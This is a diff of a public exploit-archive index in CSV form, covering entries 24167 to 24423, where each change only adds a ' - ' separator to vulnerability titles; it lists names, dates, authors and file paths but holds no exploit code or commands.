24167,platforms/php/webapps/24167.txt,"SquirrelMail 1.2.x - From Email Header HTML Injection",2004-06-03,anonymous,php,webapps,0 24168,platforms/php/webapps/24168.txt,"Mail Manage EX 3.1.8 MMEX - Script Settings Parameter Remote PHP File Include",2004-06-03,"The Warlock [BhQ]",php,webapps,0 24169,platforms/php/webapps/24169.txt,"Crafty Syntax Live Help 2.7.3 - Multiple HTML Injection Vulnerabilities",2004-06-04,"HNK Technology Solutions",php,webapps,0 -24170,platforms/multiple/dos/24170.txt,"Colin McRae Rally 2004 Multiplayer Denial of Service",2004-06-04,"Luigi Auriemma",multiple,dos,0 +24170,platforms/multiple/dos/24170.txt,"Colin McRae Rally 2004 - Multiplayer Denial of Service",2004-06-04,"Luigi Auriemma",multiple,dos,0 24171,platforms/windows/local/24171.c,"SmartStuff FoolProof Security Program 3.9.x - Administrative Password Recovery",2004-06-05,"Cyrillium Security",windows,local,0 24172,platforms/php/webapps/24172.txt,"cPanel 5-9 - Killacct Script Customer Account DNS Information Deletion",2004-06-05,"qbann targ",php,webapps,0 24173,platforms/php/local/24173.txt,"PHP 4.3.x - Microsoft Windows Shell Escape Functions Command Execution",2004-06-07,"Daniel Fabian",php,local,0 @@ -21375,7 +21370,7 @@ id,file,description,date,author,platform,type,port 24181,platforms/openbsd/dos/24181.sh,"OpenBSD 3.x - ISAKMPD Security Association Piggyback Delete Payload Denial of Service",2004-06-08,"Thomas Walpuski",openbsd,dos,0 24182,platforms/linux/local/24182.c,"CVS 1.11.x - Multiple Vulnerabilities",2004-06-09,"Gyan Chawdhary",linux,local,0 24183,platforms/php/webapps/24183.txt,"cPanel 5-9 - Passwd SQL Injection",2004-06-09,verb0s@virtualnova.net,php,webapps,0 -24184,platforms/asp/webapps/24184.txt,"AspDotNetStorefront 3.3 Access Validation",2004-06-09,"Thomas Ryan",asp,webapps,0 +24184,platforms/asp/webapps/24184.txt,"AspDotNetStorefront 3.3 - Access Validation",2004-06-09,"Thomas Ryan",asp,webapps,0 24185,platforms/asp/webapps/24185.txt,"AspDotNetStorefront 3.3 - ReturnURL Parameter Cross-Site Scripting",2004-06-09,"Thomas Ryan",asp,webapps,0 24190,platforms/java/webapps/24190.txt,"PHP-Nuke 6.x/7.x - FAQ Module categories Parameter XSS",2004-06-11,"Janek Vind",java,webapps,0 24191,platforms/php/webapps/24191.txt,"PHP-Nuke 6.x/7.x - Encyclopedia Module Multiple Function XSS",2004-06-11,"Janek Vind",php,webapps,0 @@ -21383,20 +21378,20 @@ id,file,description,date,author,platform,type,port 24193,platforms/php/webapps/24193.txt,"PHP-Nuke 6.x/7.x - Multiple Input Validation Vulnerabilities",2004-06-11,"Janek Vind",php,webapps,0 24194,platforms/php/webapps/24194.txt,"PHP-Nuke 6.x/7.x - Reviews Module Multiple Parameter XSS",2004-06-11,"Janek Vind",php,webapps,0 24195,platforms/windows/dos/24195.pl,"WinAgents TFTP Server 3.0 - Remote Buffer Overrun",2004-06-11,"Ziv Kamir",windows,dos,0 -24196,platforms/windows/remote/24196.txt,"Mozilla Browser 1.6/1.7 URI Obfuscation Weakness",2004-06-14,http-equiv,windows,remote,0 +24196,platforms/windows/remote/24196.txt,"Mozilla Browser 1.6/1.7 - URI Obfuscation Weakness",2004-06-14,http-equiv,windows,remote,0 24197,platforms/cgi/webapps/24197.txt,"Linksys Web Camera Software 2.10 - Next_file Parameter Cross-Site Scripting",2004-06-14,scriptX,cgi,webapps,0 24198,platforms/asp/webapps/24198.txt,"Virtual Programming VP-ASP Shoperror Script 4/5 - Cross-Site Scripting",2004-06-14,"Thomas Ryan",asp,webapps,0 24199,platforms/php/webapps/24199.txt,"Invision Power Board 1.3 - SSI.php Cross-Site Scripting",2004-06-14,"IMAN Sharafoddin",php,webapps,0 24200,platforms/windows/local/24200.txt,"Sygate Personal Firewall Pro 5.5 - Local Fail-Close Bypass",2004-06-14,"Tan Chew Keong",windows,local,0 24201,platforms/php/webapps/24201.txt,"php-Charts - Arbitrary PHP Code Execution",2013-01-18,AkaStep,php,webapps,0 24202,platforms/hardware/webapps/24202.txt,"linksys wrt54gl firmware 4.30.15 build 2 - Multiple Vulnerabilities",2013-01-18,m-1-k-3,hardware,webapps,0 -24203,platforms/multiple/webapps/24203.txt,"SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass",2013-01-18,"Nikolas Sotiriu",multiple,webapps,0 +24203,platforms/multiple/webapps/24203.txt,"SonicWALL GMS/Viewpoint/Analyzer - Authentication Bypass",2013-01-18,"Nikolas Sotiriu",multiple,webapps,0 24204,platforms/multiple/webapps/24204.pl,"SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x - Remote Root/SYSTEM Exploit",2013-01-18,"Nikolas Sotiriu",multiple,webapps,0 -24205,platforms/linux/remote/24205.txt,"Novell NCP Pre-Auth Remote Root Exploit",2013-01-18,"Gary Nilson",linux,remote,0 -24230,platforms/hardware/remote/24230.txt,"BT Voyager 2000 Wireless ADSL Router SNMP Community String Information Disclosure",2004-06-22,"Konstantin V. Gavrilenko",hardware,remote,0 +24205,platforms/linux/remote/24205.txt,"Novell NCP - Pre-Auth Remote Root Exploit",2013-01-18,"Gary Nilson",linux,remote,0 +24230,platforms/hardware/remote/24230.txt,"BT Voyager 2000 Wireless ADSL Router - SNMP Community String Information Disclosure",2004-06-22,"Konstantin V. Gavrilenko",hardware,remote,0 24206,platforms/multiple/remote/24206.rb,"Jenkins CI Script Console - Command Execution (Metasploit)",2013-01-18,"Spencer McIntyre",multiple,remote,0 24207,platforms/windows/local/24207.c,"NVidia Display Driver Service (Nsvr) - Exploit",2013-01-18,"Jon Bailey",windows,local,0 -24208,platforms/windows/dos/24208.c,"FreeIPS 1.0 Protected Service Denial of Service",2004-06-14,shawnwebb@softhome.net,windows,dos,0 +24208,platforms/windows/dos/24208.c,"FreeIPS 1.0 Protected Service - Denial of Service",2004-06-14,shawnwebb@softhome.net,windows,dos,0 24209,platforms/windows/dos/24209.txt,"Sygate Personal Firewall Pro 5.5 - Local Denial of Service",2004-06-14,"Tan Chew Keong",windows,dos,0 24210,platforms/hp-ux/local/24210.pl,"HP-UX 7-11 - Local X Font Server Buffer Overflow",2003-03-10,watercloud,hp-ux,local,0 24211,platforms/windows/dos/24211.txt,"Microsoft Internet Explorer 6.0 - HREF Save As Denial of Service",2004-06-15,"Rafel Ivgi The-Insider",windows,dos,0 @@ -21406,14 +21401,14 @@ id,file,description,date,author,platform,type,port 24215,platforms/php/webapps/24215.txt,"phpHeaven phpMyChat 0.14.5 - usersL.php3 Multiple Parameter SQL Injection",2004-06-15,HEX,php,webapps,0 24216,platforms/php/webapps/24216.html,"phpHeaven phpMyChat 0.14.5 - edituser.php3 do_not_login Variable Authentication Bypass",2004-06-15,HEX,php,webapps,0 24217,platforms/php/webapps/24217.txt,"phpHeaven phpMyChat 0.14.5 - admin.php3 Arbitrary File Access",2004-06-15,HEX,php,webapps,0 -24218,platforms/windows/remote/24218.cpp,"Symantec Enterprise Firewall 7.0/8.0 DNSD DNS Cache Poisoning",2004-06-15,fryxar,windows,remote,0 +24218,platforms/windows/remote/24218.cpp,"Symantec Enterprise Firewall 7.0/8.0 - DNSD DNS Cache Poisoning",2004-06-15,fryxar,windows,remote,0 24219,platforms/windows/remote/24219.txt,"IBM ACPRunner 1.2.5 - ActiveX Control Dangerous Method",2004-06-16,"eEye Digital Security Team",windows,remote,0 24220,platforms/windows/remote/24220.html,"IBM EGatherer 2.0 - ActiveX Control Dangerous Method",2004-06-01,"eEye Digital Security Team",windows,remote,0 24221,platforms/linux/remote/24221.pl,"Asterisk PBX 0.7.x - Multiple Logging Format String Vulnerabilities",2004-06-18,kfinisterre@secnetops.com,linux,remote,0 24222,platforms/linux/dos/24222.c,"ircd-hybrid 7.0.1 / ircd-ratbox 1.5.1/2.0 - Socket Dequeuing Denial of Service",2004-06-19,"Erik Sperling Johansen",linux,dos,0 24223,platforms/linux/remote/24223.py,"Rlpr 2.0 msg() Function - Multiple Vulnerabilities",2004-06-19,jaguar@felinemenace.org,linux,remote,0 24224,platforms/multiple/remote/24224.c,"TildeSlash Monit 1-4 - Authentication Handling Buffer Overflow",2004-06-04,"Nilanjan De",multiple,remote,0 -24225,platforms/php/webapps/24225.php,"osTicket STS 1.2 Attachment Remote Command Execution",2004-06-21,"Guy Pearce",php,webapps,0 +24225,platforms/php/webapps/24225.php,"osTicket STS 1.2 - Attachment Remote Command Execution",2004-06-21,"Guy Pearce",php,webapps,0 24226,platforms/hardware/remote/24226.txt,"D-Link AirPlus DI-614+ / DI-624 / DI-704 - DHCP Log HTML Injection",2004-06-21,c3rb3r,hardware,remote,0 24227,platforms/php/webapps/24227.txt,"SqWebMail 4.0.4.20040524 - Email Header HTML Injection",2004-06-21,"Luca Legato",php,webapps,0 24228,platforms/php/webapps/24228.txt,"Joomla com_collector Component - Arbitrary File Upload",2013-01-19,"Red Dragon_al",php,webapps,0 @@ -21422,7 +21417,7 @@ id,file,description,date,author,platform,type,port 24232,platforms/php/webapps/24232.txt,"PHP-Nuke 1.0/2.5/3.0/4.x/5.x/6.x/7.x - Multiple Vulnerabilities",2004-06-23,"Janek Vind",php,webapps,0 24233,platforms/freebsd/dos/24233.c,"FreeBSD 4.10/5.x - execve() Unaligned Memory Access Denial of Service",2004-06-23,"Marceta Milos",freebsd,dos,0 24234,platforms/php/webapps/24234.html,"VBulletin 3.0.1 - newreply.php WYSIWYG_HTML Parameter XSS",2004-06-24,"Cheng Peng Su",php,webapps,0 -24235,platforms/php/webapps/24235.txt,"ZaireWeb Solutions Newsletter ZWS Administrative Interface Authentication Bypass",2004-06-24,GaMeS,php,webapps,0 +24235,platforms/php/webapps/24235.txt,"ZaireWeb Solutions Newsletter ZWS - Administrative Interface Authentication Bypass",2004-06-24,GaMeS,php,webapps,0 24236,platforms/cgi/webapps/24236.txt,"McMurtrey/Whitaker & Associates Cart32 2-5 GetLatestBuilds Script - Cross-Site Scripting",2004-06-28,"Dr.Ponidi Haryanto",cgi,webapps,0 24237,platforms/cgi/webapps/24237.txt,"CGIScript.net CSFAQ 1.0 Script - Path Disclosure",2004-06-28,DarkBicho,cgi,webapps,0 24238,platforms/php/webapps/24238.txt,"CuteNews 0.88/1.3 - example1.php id Parameter XSS",2004-06-28,DarkBicho,php,webapps,0 @@ -21431,8 +21426,8 @@ id,file,description,date,author,platform,type,port 24241,platforms/php/webapps/24241.txt,"PowerPortal 1.1/1.3 - modules.php Traversal Arbitrary Directory Listing",2004-06-28,DarkBicho,php,webapps,0 24242,platforms/multiple/dos/24242.java,"Sun Java Runtime Environment 1.4.x - Font Object Assertion Failure Denial of Service",2004-06-28,"Marc Schoenefeld",multiple,dos,0 24243,platforms/unix/dos/24243.txt,"IBM Lotus Domino Server 6 - Web Access Remote Denial of Service",2004-06-30,"Andreas Klein",unix,dos,0 -24244,platforms/cgi/webapps/24244.txt,"Netegrity IdentityMinder Web Edition 5.6 Null Byte XSS",2004-07-01,vuln@hexview.com,cgi,webapps,0 -24245,platforms/cgi/webapps/24245.txt,"Netegrity IdentityMinder Web Edition 5.6 Management Interface XSS",2004-07-01,vuln@hexview.com,cgi,webapps,0 +24244,platforms/cgi/webapps/24244.txt,"Netegrity IdentityMinder Web Edition 5.6 - Null Byte XSS",2004-07-01,vuln@hexview.com,cgi,webapps,0 +24245,platforms/cgi/webapps/24245.txt,"Netegrity IdentityMinder Web Edition 5.6 - Management Interface XSS",2004-07-01,vuln@hexview.com,cgi,webapps,0 24246,platforms/multiple/remote/24246.txt,"SCI Photo Chat 3.4.9 - Cross-Site Scripting",2004-07-20,"Donato Ferrante",multiple,remote,0 24247,platforms/multiple/dos/24247.txt,"Easy Chat Server 1.x - Multiple Denial of Service Vulnerabilities",2004-07-02,"Donato Ferrante",multiple,dos,0 24248,platforms/unix/dos/24248.txt,"IBM WebSphere Caching Proxy Server 5.0 2 - Denial of Service",2004-07-02,"Leandro Meiners",unix,dos,0 @@ -21441,16 +21436,16 @@ id,file,description,date,author,platform,type,port 24251,platforms/cgi/webapps/24251.txt,"Symantec Brightmail Anti-spam 6.0 - Unauthorized Message Disclosure",2004-07-05,"Thomas Springer",cgi,webapps,0 24252,platforms/cgi/webapps/24252.txt,"fastream netfile ftp/web server 6.5/6.7 - Directory Traversal",2004-07-05,"Andres Tarasco Acuna",cgi,webapps,0 24253,platforms/multiple/remote/24253.txt,"12Planet Chat Server 2.9 - Cross-Site Scripting",2004-07-05,"Donato Ferrante",multiple,remote,0 -24254,platforms/cgi/webapps/24254.txt,"BasiliX Webmail 1.1 Email Header HTML Injection",2004-07-05,"Roman Medina-Heigl Hernandez",cgi,webapps,0 +24254,platforms/cgi/webapps/24254.txt,"BasiliX Webmail 1.1 - Email Header HTML Injection",2004-07-05,"Roman Medina-Heigl Hernandez",cgi,webapps,0 24255,platforms/php/webapps/24255.txt,"JAWS 0.2/0.3 - index.php gadget Parameter Traversal Arbitrary File Access",2004-07-06,"Fernando Quintero",php,webapps,0 -24256,platforms/php/webapps/24256.php,"JAWS 0.2/0.3 Cookie Manipulation Authentication Bypass",2004-07-06,"Fernando Quintero",php,webapps,0 +24256,platforms/php/webapps/24256.php,"JAWS 0.2/0.3 - Cookie Manipulation Authentication Bypass",2004-07-06,"Fernando Quintero",php,webapps,0 24257,platforms/php/webapps/24257.txt,"JAWS 0.2/0.3 - index.php action Parameter XSS",2004-07-06,"Fernando Quintero",php,webapps,0 24258,platforms/windows/local/24258.txt,"Aloaha Credential Provider Monitor 5.0.226 - Local Privilege Escalation",2013-01-20,LiquidWorm,windows,local,0 24259,platforms/linux/remote/24259.c,"Ethereal 0.x - Multiple Unspecified iSNS / SMB / SNMP Protocol Dissector Vulnerabilities",2004-08-05,"Rémi Denis-Courmont",linux,remote,0 24260,platforms/asp/webapps/24260.txt,"Comersus Open Technologies Comersus 5.0 - comersus_gatewayPayPal.asp Price Manipulation",2004-07-07,"Thomas Ryan",asp,webapps,0 24261,platforms/asp/webapps/24261.txt,"Comersus Open Technologies Comersus 5.0 - comersus_message.asp XSS",2004-07-07,"Thomas Ryan",asp,webapps,0 -24262,platforms/windows/remote/24262.html,"Opera Web Browser 7.5x IFrame OnLoad Address Bar URL Obfuscation Weakness",2004-07-08,"bitlance winter",windows,remote,0 -24263,platforms/windows/remote/24263.txt,"Mozilla 1.7 External Protocol Handler Weakness",2004-07-08,"Keith McCanless",windows,remote,0 +24262,platforms/windows/remote/24262.html,"Opera Web Browser 7.5x - IFrame OnLoad Address Bar URL Obfuscation Weakness",2004-07-08,"bitlance winter",windows,remote,0 +24263,platforms/windows/remote/24263.txt,"Mozilla 1.7 - External Protocol Handler Weakness",2004-07-08,"Keith McCanless",windows,remote,0 24264,platforms/multiple/remote/24264.java,"Sun Java Virtual Machine 1.x - Font.createFont Method Insecure Temporary File Creation Weakness",2004-07-09,Jelmer,multiple,remote,0 24265,platforms/windows/remote/24265.html,"Microsoft Internet Explorer 5.0.1 - JavaScript Method Assignment Cross-Domain Scripting",2004-07-12,Paul,windows,remote,0 24266,platforms/windows/remote/24266.txt,"Microsoft Internet Explorer 5.0.1 - Popup.show Mouse Event Hijacking",2004-07-12,Paul,windows,remote,0 @@ -21471,7 +21466,7 @@ id,file,description,date,author,platform,type,port 24281,platforms/windows/dos/24281.pl,"Microsoft Systems Management Server 1.2/2.0 - Remote Denial of Service",2004-07-14,HexView,windows,dos,0 24282,platforms/multiple/dos/24282.txt,"Gattaca Server 2003 - web.tmpl Language Variable CPU Consumption DoS",2004-07-15,dr_insane,multiple,dos,0 24283,platforms/multiple/dos/24283.txt,"Gattaca Server 2003 POP3 - DoS",2004-07-15,dr_insane,multiple,dos,0 -24284,platforms/cgi/webapps/24284.txt,"Gattaca Server 2003 Null Byte Path Disclosure",2004-07-15,dr_insane,cgi,webapps,0 +24284,platforms/cgi/webapps/24284.txt,"Gattaca Server 2003 - Null Byte Path Disclosure",2004-07-15,dr_insane,cgi,webapps,0 24285,platforms/cgi/webapps/24285.txt,"Gattaca Server 2003 - Language Variable Path Exposure",2004-07-15,dr_insane,cgi,webapps,0 24286,platforms/cgi/webapps/24286.txt,"Gattaca Server 2003 - Cross-Site Scripting",2004-07-15,dr_insane,cgi,webapps,0 24287,platforms/cgi/webapps/24287.txt,"BoardPower Forum - ICQ.CGI Cross-Site Scripting",2004-07-15,"Alexander Antipov",cgi,webapps,0 @@ -21490,7 +21485,7 @@ id,file,description,date,author,platform,type,port 24299,platforms/asp/webapps/24299.pl,"NetSupport DNA HelpDesk 1.0 Problist Script - SQL Injection",2004-07-21,"Noam Rathaus",asp,webapps,0 24300,platforms/asp/webapps/24300.pl,"Leigh Business Enterprises Web HelpDesk 4.0 - SQL Injection",2004-07-21,"Noam Rathaus",asp,webapps,0 24301,platforms/php/webapps/24301.html,"Mensajeitor Tag Board 1.x - Authentication Bypass",2004-07-21,"Jordi Corrales",php,webapps,0 -24302,platforms/asp/webapps/24302.pl,"Polar Helpdesk 3.0 Cookie Based Authentication System Bypass",2004-07-21,"Noam Rathaus",asp,webapps,0 +24302,platforms/asp/webapps/24302.pl,"Polar Helpdesk 3.0 - Cookie Based Authentication System Bypass",2004-07-21,"Noam Rathaus",asp,webapps,0 24303,platforms/php/webapps/24303.txt,"Layton Technology HelpBox 3.0.1 - Multiple SQL Injection",2004-07-21,"Noam Rathaus",php,webapps,0 24304,platforms/windows/remote/24304.txt,"Imatix Xitami 2.5 - Server Side Includes Cross-Site Scripting",2004-07-22,"Oliver Karow",windows,remote,0 24305,platforms/multiple/dos/24305.txt,"PSCS VPOP3 2.0 - Email Server Remote Denial of Service",2004-07-22,dr_insane,multiple,dos,0 @@ -21512,8 +21507,8 @@ id,file,description,date,author,platform,type,port 24321,platforms/multiple/remote/24321.rb,"Movable Type 4.2x / 4.3x - Web Upgrade Remote Code Execution",2013-01-07,Metasploit,multiple,remote,0 24322,platforms/multiple/remote/24322.rb,"SonicWALL Gms 6 - Arbitrary File Upload",2013-01-24,Metasploit,multiple,remote,0 24323,platforms/multiple/remote/24323.rb,"Novell eDirectory 8 - Buffer Overflow",2013-01-24,Metasploit,multiple,remote,0 -24324,platforms/php/webapps/24324.txt,"PostNuke 0.72/0.75 Reviews Module Cross-Site Scripting",2004-07-26,DarkBicho,php,webapps,0 -24325,platforms/multiple/remote/24325.html,"Opera Web Browser 7.53 Location Replace URI Obfuscation Weakness",2004-07-27,"bitlance winter",multiple,remote,0 +24324,platforms/php/webapps/24324.txt,"PostNuke 0.72/0.75 Reviews Module - Cross-Site Scripting",2004-07-26,DarkBicho,php,webapps,0 +24325,platforms/multiple/remote/24325.html,"Opera Web Browser 7.53 - Location Replace URI Obfuscation Weakness",2004-07-27,"bitlance winter",multiple,remote,0 24326,platforms/cgi/remote/24326.txt,"RiSearch 0.99 - /RiSearch Pro 3.2.6 show.pl Open Proxy Relay",2004-07-27,"Phil Robinson",cgi,remote,0 24327,platforms/cgi/remote/24327.txt,"RiSearch 0.99 - /RiSearch Pro 3.2.6 show.pl Arbitrary File Access",2004-07-27,"Phil Robinson",cgi,remote,0 24328,platforms/windows/remote/24328.txt,"Microsoft Internet Explorer 5.0.1 - Style Tag Comment Memory Corruption",2004-07-08,"Phuong Nguyen",windows,remote,0 @@ -21533,7 +21528,7 @@ id,file,description,date,author,platform,type,port 24342,platforms/cgi/remote/24342.txt,"Webcam Corp Webcam Watchdog 4.0.1 - sresult.exe Cross-Site Scripting",2004-08-02,dr_insane,cgi,remote,0 24343,platforms/windows/dos/24343.txt,"MailEnable 1.1x - Content-Length Denial of Service",2004-07-30,CoolICE,windows,dos,0 24344,platforms/hardware/dos/24344.txt,"U.S. Robotics USR808054 Wireless Access Point - Web Administration Denial of Service",2004-08-02,"Albert Puigsech Galicia",hardware,dos,0 -24345,platforms/windows/remote/24345.txt,"IBM Tivoli Directory Server 3.2.2/4.1 LDACGI Directory Traversal",2004-08-02,anonymous,windows,remote,0 +24345,platforms/windows/remote/24345.txt,"IBM Tivoli Directory Server 3.2.2/4.1 - LDACGI Directory Traversal",2004-08-02,anonymous,windows,remote,0 24346,platforms/linux/dos/24346.txt,"Mozilla 1.x - and Netscape 7.0/7.1 SOAPParameter Integer Overflow",2004-08-02,zen-parse,linux,dos,0 24347,platforms/cgi/webapps/24347.txt,"Pete Stein GoScript 2.0 - Remote Command Execution",2004-08-04,"Francisco Alisson",cgi,webapps,0 24348,platforms/php/webapps/24348.txt,"eNdonesia 8.3 - Search Form Cross-Site Scripting",2004-08-04,"Ahmad Muammar",php,webapps,0 @@ -21541,14 +21536,14 @@ id,file,description,date,author,platform,type,port 24350,platforms/windows/remote/24350.txt,"acme thttpd 2.0.7 - Directory Traversal",2004-08-04,CoolICE,windows,remote,0 24351,platforms/multiple/dos/24351.c,"Free Web Chat Initial Release - UserManager.java Null Pointer DoS",2004-08-04,"Donato Ferrante",multiple,dos,0 24352,platforms/multiple/dos/24352.java,"Free Web Chat Initial Release - Connection Saturation DoS",2004-08-04,"Donato Ferrante",multiple,dos,0 -24353,platforms/unix/remote/24353.sql,"Oracle 9i Multiple Unspecified Vulnerabilities",2004-08-04,"Marco Ivaldi",unix,remote,0 +24353,platforms/unix/remote/24353.sql,"Oracle 9i - Multiple Unspecified Vulnerabilities",2004-08-04,"Marco Ivaldi",unix,remote,0 24354,platforms/windows/remote/24354.txt,"Microsoft Internet Explorer 6.0 - mms Protocol Handler Executable Command Line Injection",2004-08-05,"Nicolas Robillard",windows,remote,0 -24355,platforms/linux/dos/24355.txt,"GNU Info 4.7 Follow XRef Buffer Overrun",2004-08-06,"Josh Martin",linux,dos,0 +24355,platforms/linux/dos/24355.txt,"GNU Info 4.7 - Follow XRef Buffer Overrun",2004-08-06,"Josh Martin",linux,dos,0 24358,platforms/linux/dos/24358.txt,"Xine-Lib 0.99 - Remote Buffer Overflow",2004-07-08,c0ntex,linux,dos,0 24359,platforms/php/webapps/24359.php,"YaPiG 0.92 - Remote Server-Side Script Execution",2004-07-07,aCiDBiTS,php,webapps,0 24360,platforms/linux/dos/24360.py,"GNU CFEngine 2.0.x/2.1 - AuthenticationDialogue Remote Heap Based Buffer Overrun (1)",2004-08-09,"Juan Pablo Martinez Kuhn",linux,dos,0 24361,platforms/linux/remote/24361.c,"GNU CFEngine 2.0.x/2.1 - AuthenticationDialogue Remote Heap Based Buffer Overrun (2)",2004-08-09,jsk,linux,remote,0 -24362,platforms/windows/dos/24362.txt,"Internet Security Systems BlackICE PC Protection 3.6 Firewall.INI Local Buffer Overrun",2004-08-11,"Paul Craig",windows,dos,0 +24362,platforms/windows/dos/24362.txt,"Internet Security Systems BlackICE PC Protection 3.6 - Firewall.INI Local Buffer Overrun",2004-08-11,"Paul Craig",windows,dos,0 24363,platforms/windows/remote/24363.txt,"clearswift mimesweeper for Web 4.0/5.0 - Directory Traversal",2004-07-11,"Kroma Pierre",windows,remote,0 24364,platforms/php/webapps/24364.txt,"WordPress SolveMedia 1.1.0 Plugin - CSRF",2013-01-25,"Junaid Hussain",php,webapps,0 24365,platforms/php/webapps/24365.txt,"ImageCMS 4.0.0b - Multiple Vulnerabilities",2013-01-25,"High-Tech Bridge SA",php,webapps,0 @@ -21556,11 +21551,11 @@ id,file,description,date,author,platform,type,port 24367,platforms/php/webapps/24367.txt,"IceWarp Web Mail 3.3.2/5.2.7 - Multiple Remote Input Validation Vulnerabilities",2004-08-11,ShineShadow,php,webapps,0 24368,platforms/asp/webapps/24368.txt,"MapInfo Discovery 1.0/1.1 - Remote Log File Access Information Disclosure",2004-07-15,anonymous,asp,webapps,0 24369,platforms/asp/webapps/24369.txt,"MapInfo Discovery 1.0/1.1 - MapFrame.asp mapname Parameter XSS",2004-07-15,anonymous,asp,webapps,0 -24370,platforms/asp/webapps/24370.txt,"MapInfo Discovery 1.0/1.1 Cleartext Transmission Credential Disclosure",2004-07-15,anonymous,asp,webapps,0 +24370,platforms/asp/webapps/24370.txt,"MapInfo Discovery 1.0/1.1 - Cleartext Transmission Credential Disclosure",2004-07-15,anonymous,asp,webapps,0 24371,platforms/asp/webapps/24371.txt,"MapInfo Discovery 1.0/1.1 - Administrative Login Bypass",2004-07-15,anonymous,asp,webapps,0 24372,platforms/php/webapps/24372.txt,"CuteNews 1.3.1 - show_archives.php archive Parameter XSS",2004-07-16,"Debasis Mohanty",php,webapps,0 24373,platforms/php/webapps/24373.txt,"PScript PForum 1.24/1.25 - User Profile HTML Injection",2004-07-16,"Christoph Jeschke",php,webapps,0 -24374,platforms/windows/local/24374.c,"Ipswitch IMail Server 7/8 Weak Password Encryption Weakness",1999-12-20,Adik,windows,local,0 +24374,platforms/windows/local/24374.c,"Ipswitch IMail Server 7/8 - Weak Password Encryption Weakness",1999-12-20,Adik,windows,local,0 24375,platforms/php/webapps/24375.txt,"RaXnet Cacti 0.6.x/0.8.x - Auth_Login.php SQL Injection",2004-07-16,"Fernando Quintero",php,webapps,0 24376,platforms/multiple/remote/24376.txt,"Opera Web Browser 7.5 - Resource Detection Weakness",2004-07-17,"GreyMagic Software",multiple,remote,0 24377,platforms/php/webapps/24377.txt,"Merak Mail Server 7.4.5 - address.html Multiple Parameter XSS",2004-07-17,Criolabs,php,webapps,0 @@ -21570,8 +21565,8 @@ id,file,description,date,author,platform,type,port 24381,platforms/php/webapps/24381.txt,"Merak Mail Server 7.4.5 - address.html Path Disclosure",2004-07-17,Criolabs,php,webapps,0 24382,platforms/php/webapps/24382.txt,"Merak Mail Server 7.4.5 - calendar.html schedule Parameter SQL Injection",2004-07-17,Criolabs,php,webapps,0 24383,platforms/php/webapps/24383.php,"Gallery 1.4.4 - Remote Server-Side Script Execution",2004-07-17,aCiDBiTS,php,webapps,0 -24384,platforms/php/webapps/24384.txt,"PHP-Fusion Database Backup Information Disclosure",2004-07-18,"Ahmad Muammar",php,webapps,0 -24385,platforms/asp/webapps/24385.txt,"Zixforum ZixForum.mdb Database Disclosure",2004-07-19,"Security .Net Information",asp,webapps,0 +24384,platforms/php/webapps/24384.txt,"PHP-Fusion Database Backup - Information Disclosure",2004-07-18,"Ahmad Muammar",php,webapps,0 +24385,platforms/asp/webapps/24385.txt,"Zixforum - ZixForum.mdb Database Disclosure",2004-07-19,"Security .Net Information",asp,webapps,0 24386,platforms/multiple/dos/24386.txt,"British National Corpus SARA - Remote Buffer Overflow",2004-07-20,"Matthias Bethke",multiple,dos,0 24387,platforms/multiple/remote/24387.txt,"Nihuo Web Log Analyzer 1.6 - HTML Injection",2004-08-20,"Audun Larsen",multiple,remote,0 24388,platforms/multiple/dos/24388.txt,"aGSM 2.35 Half-Life Server - Info Response Buffer Overflow",2004-08-20,Dimetrius,multiple,dos,0 @@ -21580,11 +21575,11 @@ id,file,description,date,author,platform,type,port 24391,platforms/php/webapps/24391.txt,"Mantis 0.x - Multiple Cross-Site Scripting Vulnerabilities",2004-08-21,"Jose Antonio",php,webapps,0 24392,platforms/php/webapps/24392.php,"Mantis 0.x - New Account Signup Mass Emailing",2004-08-21,"Jose Antonio",php,webapps,0 24393,platforms/php/webapps/24393.txt,"MyDms 1.4 - SQL Injection / Directory Traversal",2004-08-21,"Jose Antonio",php,webapps,0 -24394,platforms/multiple/dos/24394.txt,"Opera Web Browser 7.23 JavaScript Denial of Service",2004-08-21,sourvivor,multiple,dos,0 +24394,platforms/multiple/dos/24394.txt,"Opera Web Browser 7.23 - JavaScript Denial of Service",2004-08-21,sourvivor,multiple,dos,0 24395,platforms/windows/dos/24395.txt,"Microsoft Internet Explorer 6.0 / Firefox 0.8/0.9.x - JavaScript Denial of Service",2004-08-23,MeFakon,windows,dos,0 24396,platforms/php/webapps/24396.txt,"JShop E-Commerce Suite 3.0 - Page.php Cross-Site Scripting",2004-08-23,"Dr Ponidi Haryanto",php,webapps,0 24397,platforms/asp/webapps/24397.txt,"Compulsive Media CNU5 - News.mdb Database Disclosure",2004-08-23,"Security .Net Information",asp,webapps,0 -24398,platforms/linux/local/24398.sh,"IMWheel 1.0 Predictable Temporary File Creation",2004-08-23,I)ruid,linux,local,0 +24398,platforms/linux/local/24398.sh,"IMWheel 1.0 - Predictable Temporary File Creation",2004-08-23,I)ruid,linux,local,0 24399,platforms/php/webapps/24399.txt,"PhotoADay - Pad_selected Parameter Cross-Site Scripting",2004-08-23,"King Of Love",php,webapps,0 24400,platforms/cgi/webapps/24400.txt,"Axis Network Camera 2.x And Video Server 1-3 - virtualinput.cgi Arbitrary Command Execution",2004-08-23,bashis,cgi,webapps,0 24403,platforms/php/webapps/24403.txt,"EGroupWare 1.0 Calendar Module - date Parameter XSS",2004-08-23,"Joxean Koret",php,webapps,0 @@ -21607,18 +21602,18 @@ id,file,description,date,author,platform,type,port 24418,platforms/windows/remote/24418.txt,"Xedus Web Server 1.0 - testgetrequest.x username Parameter XSS",2004-09-30,"James Bercegay",windows,remote,0 24419,platforms/windows/remote/24419.txt,"Xedus Web Server 1.0 - Traversal Arbitrary File Access",2004-09-30,"James Bercegay",windows,remote,0 24420,platforms/asp/webapps/24420.txt,"Web Animations Password Protect - Multiple Input Validation Vulnerabilities",2004-08-31,Criolabs,asp,webapps,0 -24421,platforms/linux/local/24421.c,"Debian bsdmainutils 6.0.14 Calendar Information Disclosure",2004-08-31,"Steven Van Acker",linux,local,0 +24421,platforms/linux/local/24421.c,"Debian bsdmainutils 6.0.14 - Calendar Information Disclosure",2004-08-31,"Steven Van Acker",linux,local,0 24422,platforms/asp/webapps/24422.txt,"Comersus Cart 5.0 - HTTP Response Splitting",2004-09-01,"Maestro De-Seguridad",asp,webapps,0 24423,platforms/multiple/dos/24423.txt,"Cerbere Proxy Server 1.2 - Long Host Header Field Remote Denial of Service",2004-09-01,"GSS IT",multiple,dos,0 